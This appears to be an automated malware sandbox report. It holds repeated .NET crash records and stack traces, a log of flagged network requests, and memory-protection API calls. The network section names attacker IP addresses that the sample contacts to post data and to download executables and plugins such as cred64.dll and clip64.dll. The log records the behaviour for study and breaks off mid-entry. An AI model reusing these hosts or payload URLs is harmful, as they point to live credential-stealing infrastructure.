exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa86dc6b
registers.esp: 35908068
registers.edi: 35908412
registers.eax: 0
registers.ebp: 35908076
registers.edx: 0
registers.ebx: 35911044
registers.esi: 43197276
registers.ecx: 44323572
1 0 0

__exception__

 stacktrace: 
0xa86dc28
0xa869b94
0xa86942a
0xa869315
0xa867bb3
0xa866d49
0x226d9ff
0x2267855
0x2266f0b
0x2263c6b
0x22635d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72752652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7276264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72762e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72817610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa86dc6b
registers.esp: 35908068
registers.edi: 35908412
registers.eax: 0
registers.ebp: 35908076
registers.edx: 0
registers.ebx: 35911044
registers.esi: 43197276
registers.ecx: 41869188
1 0 0

__exception__

 stacktrace: 
0xa86dc28
0xa869b94
0xa86942a
0xa869315
0xa867bb3
0xa866d49
0x226d9ff
0x2267855
0x2266f0b
0x2263c6b
0x22635d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72752652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7276264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72762e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72817610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa86dc6b
registers.esp: 35908068
registers.edi: 35908412
registers.eax: 0
registers.ebp: 35908076
registers.edx: 0
registers.ebx: 35911044
registers.esi: 41854228
registers.ecx: 43129496
1 0 0

__exception__

 stacktrace: 
0xa86dc28
0xa86e736
0xa86dff1
0xa8692fd
0xa867e9c
0xa866d49
0x226d9ff
0x2267855
0x2266f0b
0x2263c6b
0x22635d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72752652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7276264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72762e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72817610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa86dc6b
registers.esp: 35908044
registers.edi: 35908436
registers.eax: 0
registers.ebp: 35908052
registers.edx: 0
registers.ebx: 35911044
registers.esi: 41854228
registers.ecx: 44438336
1 0 0

__exception__

 stacktrace: 
0xa86dc28
0xa86e736
0xa86dff1
0xa869315
0xa867e9c
0xa866d49
0x226d9ff
0x2267855
0x2266f0b
0x2263c6b
0x22635d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72752652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7276264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72762e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72817610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa86dc6b
registers.esp: 35908044
registers.edi: 35908436
registers.eax: 0
registers.ebp: 35908052
registers.edx: 0
registers.ebx: 35911044
registers.esi: 41854228
registers.ecx: 45857332
1 0 0

__exception__

 stacktrace: 
0xa86dc28
0xa86e736
0xa86dff1
0xa869315
0xa867e9c
0xa866d49
0x226d9ff
0x2267855
0x2266f0b
0x2263c6b
0x22635d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72752652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7276264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72762e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72817610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa86dc6b
registers.esp: 35908044
registers.edi: 35908436
registers.eax: 0
registers.ebp: 35908052
registers.edx: 0
registers.ebx: 35911044
registers.esi: 41854228
registers.ecx: 47204096
1 0 0

__exception__

 stacktrace: 
0xa86dc28
0xa86f062
0xa86ea09
0xa8692fd
0xa867fb4
0xa866d49
0x226d9ff
0x2267855
0x2266f0b
0x2263c6b
0x22635d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72752652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7276264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72762e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72817610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa86dc6b
registers.esp: 35908096
registers.edi: 35908436
registers.eax: 0
registers.ebp: 35908104
registers.edx: 0
registers.ebx: 35911044
registers.esi: 41854228
registers.ecx: 42374540
1 0 0

__exception__

 stacktrace: 
0xa86dc28
0xa86f062
0xa86ea09
0xa869315
0xa867fb4
0xa866d49
0x226d9ff
0x2267855
0x2266f0b
0x2263c6b
0x22635d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72752652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7276264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72762e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72817610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa86dc6b
registers.esp: 35908096
registers.edi: 35908436
registers.eax: 0
registers.ebp: 35908104
registers.edx: 0
registers.ebx: 35911044
registers.esi: 41825484
registers.ecx: 43768464
1 0 0

__exception__

 stacktrace: 
0xa86dc28
0xa86f062
0xa86ea09
0xa869315
0xa867fb4
0xa866d49
0x226d9ff
0x2267855
0x2266f0b
0x2263c6b
0x22635d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72752652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7276264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72762e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72817610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa86dc6b
registers.esp: 35908096
registers.edi: 35908436
registers.eax: 0
registers.ebp: 35908104
registers.edx: 0
registers.ebx: 35911044
registers.esi: 41825484
registers.ecx: 45162112
1 0 0

__exception__

 stacktrace: 
0xa86dc28
0xa86f774
0xa86f1d1
0xa8692fd
0xa8680ba
0xa866d49
0x226d9ff
0x2267855
0x2266f0b
0x2263c6b
0x22635d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72752652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7276264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72762e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72817610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa86dc6b
registers.esp: 35908128
registers.edi: 35908436
registers.eax: 0
registers.ebp: 35908136
registers.edx: 0
registers.ebx: 35911044
registers.esi: 41825484
registers.ecx: 42174868
1 0 0

__exception__

 stacktrace: 
0xa86dc28
0xa86f774
0xa86f1d1
0xa869315
0xa8680ba
0xa866d49
0x226d9ff
0x2267855
0x2266f0b
0x2263c6b
0x22635d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72752652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7276264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72762e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72817610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa86dc6b
registers.esp: 35908128
registers.edi: 35908436
registers.eax: 0
registers.ebp: 35908136
registers.edx: 0
registers.ebx: 35911044
registers.esi: 41825484
registers.ecx: 43315464
1 0 0

__exception__

 stacktrace: 
0xa86dc28
0xa86f774
0xa86f1d1
0xa869315
0xa8680ba
0xa866d49
0x226d9ff
0x2267855
0x2266f0b
0x2263c6b
0x22635d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72752652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7276264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72762e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72817610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa86dc6b
registers.esp: 35908128
registers.edi: 35908436
registers.eax: 0
registers.ebp: 35908136
registers.edx: 0
registers.ebx: 35911044
registers.esi: 41825484
registers.ecx: 44711736
1 0 0

__exception__

 stacktrace: 
0xa86dc28
0xc80f9b
0xc80546
0xa866da1
0x226d9ff
0x2267855
0x2266f0b
0x2263c6b
0x22635d9
DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72752652
DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7276264f
DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72762e95
DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x728174ec
DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x72817610
CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x728a1dc4
CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x728a1e67
CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x728a1f7a
_CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x728a416a
_CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x73ebf5a3
CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73f37f16
_CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73f34de3
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x778d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x778d9ea5

exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3
exception.instruction: mov eax, dword ptr [eax + 4]
exception.exception_code: 0xc0000005
exception.symbol:
exception.address: 0xa86dc6b
registers.esp: 35908948
registers.edi: 35909212
registers.eax: 0
registers.ebp: 35908956
registers.edx: 0
registers.ebx: 35911044
registers.esi: 45280644
registers.ecx: 45287620
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://77.91.68.63/doma/net/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://83.97.73.129/smoke/foto172.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://83.97.73.129/smoke/fotod95.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://83.97.73.129/test1/mu.exe
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.68.63/doma/net/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://77.91.68.63/doma/net/Plugins/clip64.dll
request POST http://77.91.68.63/doma/net/index.php
request GET http://83.97.73.129/smoke/foto172.exe
request GET http://83.97.73.129/smoke/fotod95.exe
request GET http://83.97.73.129/test1/mu.exe
request GET http://77.91.68.63/doma/net/Plugins/cred64.dll
request GET http://77.91.68.63/doma/net/Plugins/clip64.dll
request POST http://77.91.68.63/doma/net/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 652
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00401000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74601000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2112
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f51000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00401000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f31000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 1966080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01f30000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f22000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 1245184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02130000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02220000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73522000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73e9b000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ee1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72ee2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 327680
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02050000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
